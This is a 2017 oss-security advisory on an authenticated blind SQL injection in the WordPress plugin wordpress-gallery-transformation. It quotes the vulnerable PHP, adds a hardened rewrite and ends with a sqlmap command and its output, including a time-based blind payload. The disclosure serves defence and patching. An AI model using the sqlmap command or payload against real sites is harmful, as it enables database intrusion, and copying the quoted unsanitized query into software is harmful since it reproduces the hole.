List:       oss-security
Subject:    [oss-security] Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-08-25 16:03:02
Message-ID: 29FBF111-3395-49B0-8A35-4E6D36963175 () me ! com

Title: Authenticated Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-22
CVE-ID: CVE-2017-1002028
Download Site: https://wordpress.org/plugins/wordpress-gallery-transformation/
Vendor: http://angrybyte.com
Vendor Notified: 2017-08-07
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=199
Description: Transforms word press into a gallery, wallpapers website, you name it.
Vulnerability:
SQL injection in ./wordpress-gallery-transformation/gallery.php via the $jpic parameter, which is unsanitized before being passed into an SQL query.

Relevant excerpt from gallery.php (lines 231-240):

 $pfx=$wpdb->prefix;
dbcreator();
 if($_GET['picnj']){

 $jpic=$_GET['picnj'];
 $jnm=$_GET['nmj'];
 $wpdb->query("update {$pfx}gallery set name='{$jnm}' where id=$jpic;");
 $wpdb->query("update {$pfx}gallery set rates=44");
 return 'ok?';

The attacker will need to be logged in and able to manage the gallery in order to exploit.
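For comparison, here is a hardened version of that handler, written for this post as an illustration (it is not the plugin's code or the vendor's fix). It assumes the same $wpdb global and {$pfx}gallery table as the excerpt; the nonce action name 'wgt_rename_pic' and the function name are placeholders.

```php
<?php
// Added example, not the plugin's code. Assumes the same $wpdb global and
// {$pfx}gallery table as the excerpt above; 'wgt_rename_pic' is a placeholder
// nonce action chosen for this illustration.
function wgt_rename_picture_secure() {
    global $wpdb;
    $pfx = $wpdb->prefix;

    // Only users allowed to manage the site may reach the query, and the
    // request must carry a valid nonce so a logged-in admin cannot be
    // tricked into issuing it from another page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'wgt_rename_pic' );

    if ( ! isset( $_GET['picnj'], $_GET['nmj'] ) ) {
        return 'missing parameters';
    }

    // Coerce the id to a non-negative integer and normalise the name to
    // plain text; WordPress adds slashes to superglobals, hence wp_unslash().
    $jpic = absint( wp_unslash( $_GET['picnj'] ) );
    $jnm  = sanitize_text_field( wp_unslash( $_GET['nmj'] ) );
    if ( 0 === $jpic ) {
        return 'invalid id';
    }

    // $wpdb->prepare() binds both values: %d forces an integer and %s is
    // quoted and escaped, so neither request parameter can alter the
    // statement the way the raw interpolation of $jpic and $jnm did.
    $updated = $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$pfx}gallery SET name = %s WHERE id = %d",
            $jnm,
            $jpic
        )
    );

    return ( false === $updated ) ? 'db error' : 'ok';
}
```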

Exploit Code:

$ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END)
---
[13:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 13:16:53
